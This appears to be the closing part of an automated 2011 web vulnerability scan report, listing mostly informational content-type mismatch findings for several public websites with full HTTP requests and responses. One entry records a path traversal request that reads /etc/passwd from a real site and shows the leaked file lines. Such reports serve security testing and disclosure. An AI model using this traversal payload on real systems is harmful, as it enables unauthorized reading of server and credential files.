User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:52:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
Last-Modified: Thu, 24 Jun 2010 22:49:28 GMT
ETag: "7d0c00-12d1-489ce77802e00"
Accept-Ranges: bytes
Content-Length: 4817
Cache-Control: max-age=2903040, public
Content-Type: image/gif

.PNG
.
...IHDR...i...-......KE@....gAMA......a....    pHYs..........o.d...sIDATx^.\    t..u.......i...]....N..1.vH...n.....6...m....F..m3ZY.....Y..v        .V...v..$..    ......~.H#.....9..=#.........{.3.r...l0H
...[SNIP]...

33.79. http://www.nextadvisor.com/includes/javascript.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /includes/javascript.php?script=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:26:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 1830

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/
...[SNIP]...

33.80. http://www.nextadvisor.com/link.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /link.php?kw=blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro&category=security&link=eset&id=305 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:10:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=fbb3b93f7303ec3062b1cef62bec6e33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 26

No link for security/eset

33.81. https://www.pcisecuritystandards.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.pcisecuritystandards.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.pcisecuritystandards.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:27:53 GMT
Server: Apache
Last-Modified: Wed, 03 Nov 2010 12:55:01 GMT
ETag: "3535bc-57e-494258ca27340"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 1406

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

33.82. http://www.reputationengineer.com/wp-content/plugins/cforms/lib_ajax.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reputationengineer.com
Path:   /wp-content/plugins/cforms/lib_ajax.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Method: POST http://www.reputationengineer.com/wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.reputationengineer.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 51

rs=reset_captcha&rst=&rsrnd=1303692470955&rsargs[]=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:31:02 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Content-Type: text/html
Content-Length: 234

+:var res = 'newcap||http://www.reputationengineer.com/wp-content/plugins/cforms/cforms-captcha.php?ts=&c1=4&c2=5&ac=abcdefghijkmnpqrstuvwxyz23456789&i=i&w=115&h=25&c=000066&l=000066&f=font4.ttf&a1=-1
...[SNIP]...

33.83. http://www.reputationengineer.com/wp-content/themes/flexibility2/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reputationengineer.com
Path:   /wp-content/themes/flexibility2/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /wp-content/themes/flexibility2/ HTTP/1.1
Host: www.reputationengineer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=42aa81e376903eb93de66220fdda0695; __utmz=62854959.1303691656.1.1.utmgclid=CN-bzOa1tqgCFYbb4AodHHmKBw|utmccn=(not%20set)|utmcmd=(not%20set); turing_string_=i%2B7f6e79dd155076173dacee760bb74dea; __utma=62854959.1840992496.1303691656.1303691656.1303691656.1; __utmc=62854959; __utmb=62854959.6.10.1303691656

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:48:42 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Content-Type: text/html
Content-Length: 379

<br />
<b>Warning</b>: Invalid argument supplied for foreach() in <b>/home/viloria/public_html/reputationengineer.com/wp-content/themes/flexibility2/index.php</b> on line <b>3</b><br />
<br />
<b>Fat
...[SNIP]...

33.84. http://www.reputationengineer.com/wp-content/themes/flexibility2/images/headerRE.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.reputationengineer.com
Path:   /wp-content/themes/flexibility2/images/headerRE.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /wp-content/themes/flexibility2/images/headerRE.jpg HTTP/1.1
Host: www.reputationengineer.com
Proxy-Connection: keep-alive
Referer: http://www.reputationengineer.com/internet-reputation-management/?gclid=CN-bzOa1tqgCFYbb4AodHHmKBw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=42aa81e376903eb93de66220fdda0695; __utmz=62854959.1303691656.1.1.utmgclid=CN-bzOa1tqgCFYbb4AodHHmKBw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=62854959.1840992496.1303691656.1303691656.1303691656.1; __utmc=62854959; __utmb=62854959.1.10.1303691656

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:34:04 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 01 Apr 2011 02:11:25 GMT
ETag: "10f18046-6ca5-49fd1ed4bed40"
Accept-Ranges: bytes
Content-Length: 27813
Content-Type: image/jpeg

.PNG
.
...IHDR.............E......tEXtSoftware.Adobe ImageReadyq.e<..lGIDATx...    ..Wu.^..t.>#o..-..w.%/...b.m$    .....&!....O......%...YH^....B..Y.....e.....l.......k.......S.....[u...9...Su.....>_.
...[SNIP]...

33.85. https://www.senderscore.org/register/getprovinces.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.senderscore.org
Path:   /register/getprovinces.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /register/getprovinces.php?myid= HTTP/1.1
Host: www.senderscore.org
Connection: keep-alive
Referer: https://www.senderscore.org/landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campid=701000000005Ucl; ss_lookup=osci4fep75ko01fvibcjgf03n3; BIGipServerw3pub=3372373002.20480.0000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:59 GMT
Server: Apache/2.2.9 (Unix) DAV/2 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 35
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[ { "title": "N/A", "key": "N/A" }]

33.86. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.PE/Pages/JQueryHandler.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.swisscom.ch
Path:   /Swisscom.CorporatePortal.Web.PE/Pages/JQueryHandler.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /Swisscom.CorporatePortal.Web.PE/Pages/JQueryHandler.aspx HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://www.swisscom.ch/res/hilfe/kontakt/index.htm
Origin: http://www.swisscom.ch
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.167121303670987960; s_vnum=1306263001740%26vn%3D1; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; CTQ=second; ASP.NET_SessionId=1hn0oa55wh0xxciu4mjibnvz; languageId=en; s_cc=true; s_nr=1303671158338-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=res%3Anone; s_visit=1; B=res; s_sq=%5B%5BB%5D%5D
Content-Length: 25

Method=GetCurrentLanguage

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:56:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2
X-Cache: MISS from www.swisscom.ch

en

33.87. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.RES/Pages/ServerVariables.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.swisscom.ch
Path:   /Swisscom.CorporatePortal.Web.RES/Pages/ServerVariables.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /Swisscom.CorporatePortal.Web.RES/Pages/ServerVariables.aspx HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://www.swisscom.ch/res/hilfe/kontakt/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.167121303670987960; s_vnum=1306263001740%26vn%3D1; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; s_cc=true; CTQ=second; s_nr=1303671082855-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; B=level0; s_sq=swisscom-onelive%3D%2526pid%253Dlevel0/en/privatkunden/63%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA; ASP.NET_SessionId=1hn0oa55wh0xxciu4mjibnvz; languageId=en

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2169
X-Cache: MISS from www.swisscom.ch

var APPL_MD_PATH = "/LM/W3SVC/322437409/Root/Swisscom.CorporatePortal.Web.RES";
var AUTH_TYPE = "";
var AUTH_USER = "";
var AUTH_PASSWORD = "";
var LOGON_USER = "";
var REMOTE_USER = "";

...[SNIP]...

33.88. http://www.truecredit.com/Shortcut_Icon_TU.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.truecredit.com
Path:   /Shortcut_Icon_TU.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /Shortcut_Icon_TU.ico HTTP/1.1
Host: www.truecredit.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; TLSESSIONID=1303691658482; TCVISIT=558554714-New-TrueCredit; JSESSIONID=d6eHw60bY1o7; s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_visit%3D1%7C1303693477003%3B%20s_depth%3D1%7C1303693477019%3B%20dfa_cookie%3Dtuitruecredit%7C1303693477033%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674498602'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678378941'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303691677045'%255D%255D%7C1461544477045%3B%20s_vnum%3D1306266408564%2526vn%253D3%7C1306266408564%3B%20s_invisit%3Dtrue%7C1303693477057%3B%20s_lv%3D1303691677073%7C1398299677073%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693477073%3B%20s_pv%3Dtc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%7C1303693477082%3B; op112homepagegum=a05w0i21zj274pm0341w7d5a3; op112homepageliid=a05w0i21zj274pm0341w7d5a3; __utmz=1.1303691678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2001284035.1303691678.1303691678.1303691678.1; __utmc=1; __utmb=1.1.10.1303691678; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303691677051%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D100%3B

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:53:31 GMT
Server: Apache
Last-Modified: Thu, 24 Feb 2011 22:57:10 GMT
ETag: "47e-22289d80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

33.89. https://www.truecredit.com/Shortcut_Icon_TU.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.truecredit.com
Path:   /Shortcut_Icon_TU.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /Shortcut_Icon_TU.ico HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; JSESSIONID=afd8RC5un2le; s_pers=%20s_visit%3D1%7C1303676208552%3B%20s_depth%3D1%7C1303676208554%3B%20dfa_cookie%3Dtuitruecredit%7C1303676208557%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674408560'%255D%255D%7C1461527208560%3B%20s_nr%3D1303674408563%7C1306266408563%3B%20s_vnum%3D1306266408564%2526vn%253D1%7C1306266408564%3B%20s_invisit%3Dtrue%7C1303676208564%3B%20s_lv%3D1303674408567%7C1398282408567%3B%20s_lv_s%3DFirst%2520Visit%7C1303676208567%3B%20s_pv%3Dtc%253Ahttps%253A%252F%252Fwww.truecredit.com%252Fproducts%252Forder2.jsp%253Fpackage%253DTriBureauCMUStartupfee%2526cb%253Dcredit%2526formName%253DfreeTriBureauCMUChoice%2526refid%253D20110324-174a3c150b7e7f3b565b%7C1303676208571%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303674408562%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D100%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:12:57 GMT
Server: Apache
Last-Modified: Thu, 24 Feb 2011 22:57:10 GMT
ETag: "47e-22289d80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

33.90. http://www.upsellit.com/custom/trustedID.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.upsellit.com
Path:   /custom/trustedID.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /custom/trustedID.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.upsellit.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 20:07:11 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: JSESSIONID=1EC8C516AE02DCD23C181811D7D9B8F8; Path=/
Set-Cookie: uid=CgoKBU20gu++zjv3FP/AAg==; expires=Mon, 23-Apr-12 20:07:11 GMT; domain=www.upsellit.com; path=/
P3P: policyref="http://www.upsellit.com/w3c/p3p.xml", CP="NON DSP LAW CUR ADMi TAIi PSAi PSD TELi OUR SAMi IND PHY DEM ONL STA NAV UNI LOC COM CNT"
Content-Length: 9317


var usiURL = location.href;
if (usiURL.indexOf("promoRefCode=CJ") != -1 || usiURL.indexOf("promoRefCode=IDTHL") != -1 || usiURL.indexOf("promoRefCode=NEXTWEB") != -1){
var USILink = "http://
...[SNIP]...

33.91. http://www.upsellit.com/upsellitJS4.jsp  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.upsellit.com
Path:   /upsellitJS4.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /upsellitJS4.jsp?qs=237274223205335307291298312323312298291312293277335341334322&siteID=5512&trackingInfo=http%3A//roia.biz/im/n/sf7Xvq1BAAGSLEMAAAVwQgAAnOhmMQA-A/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.upsellit.com
Cookie: JSESSIONID=1EC8C516AE02DCD23C181811D7D9B8F8; uid=CgoKBU20gu++zjv3FP/AAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 20:25:40 GMT
Content-Type: text/html
Connection: keep-alive
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 16772

var USItimerID = '';
var properClickThrough = false;
var USIdone = false;
var USI_suppress = false;
if (typeof(noChatPlease) != "undefined") {
   if (noChatPlease) {
   properClickThrough = true; US
...[SNIP]...

34. Content type is not specified  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://psr.infusionsoft.com
Path:   /slices/style/favicon.ico

Request

GET /slices/style/favicon.ico HTTP/1.1
Host: psr.infusionsoft.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1D05F63F025804F51DC0C60D07CE712E; SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.6.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"161-1303524253000"
Last-Modified: Sat, 23 Apr 2011 02:04:13 GMT
Content-Length: 161
Date: Mon, 25 Apr 2011 01:25:53 GMT

GIF89a..........."(....LP....uy.......05.............Y^.gk...!.......,..........N..I..8.T..A..P%..,...D9.A....0....I .h ..B................^..R"1....A..i.....;

Report generated by XSS.CX at Mon Apr 25 06:41:03 CDT 2011.